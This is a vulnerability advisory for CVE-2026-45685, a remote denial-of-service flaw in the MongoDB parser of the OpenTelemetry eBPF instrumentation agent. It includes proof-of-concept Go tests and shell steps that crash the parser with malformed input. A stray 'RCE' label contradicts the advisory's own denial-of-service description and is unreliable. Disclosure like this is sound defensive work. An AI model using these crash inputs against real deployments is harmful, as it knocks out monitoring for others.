PT-2026-41790 · Go · Go.Opentelemetry.Io/Obi

Published

2026-05-18

·

Updated

2026-05-18

·

CVE-2026-45685

CVSS v3.1

7.5

High

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

Malformed MongoDB wire messages can trigger uncaught panics in the MongoDB TCP parser, allowing a remote unauthenticated attacker to crash the telemetry agent and cause a denial of service. The parser operates on raw attacker-controlled network payloads before the input is fully validated, so a single crafted message can terminate telemetry collection for the affected process or node.

Details

MongoDB parsing support was introduced by commit 2070f568a (Add Initial support for mongodb), so the explicit released version minimum affected is v0.1.0.
There are two related panic conditions in released go.opentelemetry.io/obi versions:
  • In v0.1.0 through v0.3.0, parseOpMessage reads OP MSG flag bits from buf[msgHeaderSize:msgHeaderSize+int32Size] without first ensuring the buffer is at least msgHeaderSize + int32Size bytes long. A truncated OP MSG packet can therefore trigger a slice-bounds panic before the parser returns an error.
  • In v0.1.0 through v0.3.0, parseSections consumes the section type byte and then reads the document-sequence length from buf[offSet:offSet+int32Size] without re-validating that enough bytes remain after the type byte. A malformed document-sequence section can therefore trigger another slice-bounds panic.
  • In v0.1.0 through v0.8.0, parseFirstField assumes the collection name for collection-scoped commands is always a string and performs an unchecked type assertion on field.Value. A malformed BSON document can therefore trigger a runtime panic with interface conversion instead of returning a parse error.
The bounds-check panic was fixed by commit 3aa58cdaaa97fbb72f8ef4c3609ae425aacaf8bb (Fix MongoDB client panic), which first appears in release v0.4.0. The unchecked BSON type assertion is still present in v0.8.0.
Because this code runs while decoding attacker-controlled MongoDB traffic, the failure mode is process termination rather than graceful rejection of invalid input. In deployments where the telemetry agent monitors traffic from untrusted or partially trusted clients, a single malformed packet can terminate collection until the agent is restarted.
Affected code paths are in pkg/ebpf/common/mongo detect transform.go and correspond to parseOpMessage, parseSections, and parseFirstField.

PoC

The following reproductions are fully self-contained. They create a temporary test file inside an affected checkout and then run go test against the real parser code in the repository.
  1. Reproduce the v0.1.0 through v0.3.0 bounds-check panics:
git clone https://github.com/open-telemetry/opentelemetry-ebpf-instrumentation.git obi-poc
cd obi-poc
git checkout v0.3.0

cat > pkg/ebpf/common/mongo security poc test.go <<'EOF'
package ebpfcommon

import "testing"

func TestSecurityPoCParseOpMessageShortPanics(t *testing.T) {
    parseOpMessage(make([]byte, 16), 0, false, nil)
}

func TestSecurityPoCParseSectionsShortDocSequencePanics(t *testing.T) {
    parseSections([]byte{byte(sectionTypeDocumentSequence), 0x01, 0x02, 0x03})
}
EOF

go test ./pkg/ebpf/common -run 'TestSecurityPoCParseOpMessageShortPanics|TestSecurityPoCParseSectionsShortDocSequencePanics' -count=1
Expected result:
  • TestSecurityPoCParseOpMessageShortPanics panics with a message similar to slice bounds out of range [:20] with capacity 16
  • TestSecurityPoCParseSectionsShortDocSequencePanics panics with a message similar to slice bounds out of range [:5] with capacity 4
  1. Reproduce the v0.1.0 through v0.8.0 unchecked BSON type-assertion panic:
git clone https://github.com/open-telemetry/opentelemetry-ebpf-instrumentation.git obi-poc
cd obi-poc
git checkout v0.8.0

cat > pkg/ebpf/common/mongo security poc test.go <<'EOF'
package ebpfcommon

import (
    "testing"

    "go.mongodb.org/mongo-driver/v2/bson"
)

func TestSecurityPoCParseFirstFieldTypeAssertionPanics(t *testing.T) {
    parseFirstField(bson.E{Key: commFind, Value: int32(123)})
}
EOF

go test ./pkg/ebpf/common -run TestSecurityPoCParseFirstFieldTypeAssertionPanics -count=1
Expected result: panic with a message similar to interface conversion: interface {} is int32, not string.

Impact

This is a remote denial-of-service vulnerability in the MongoDB protocol parser. Any deployment that enables MongoDB parsing and processes attacker-controlled or malformed MongoDB traffic is impacted. Successful exploitation lets an unauthenticated attacker crash the telemetry agent by sending a crafted OP MSG packet or malformed BSON document, causing loss of observability until the process is restarted.

Fix

Incorrect Type Conversion or Cast

RCE

Weakness Enumeration

CWE-248CWE-704CWE-20

Related Identifiers

CVE-2026-45685
GHSA-J8P6-96VP-F3R9

Affected Products

Go.Opentelemetry.Io/Obi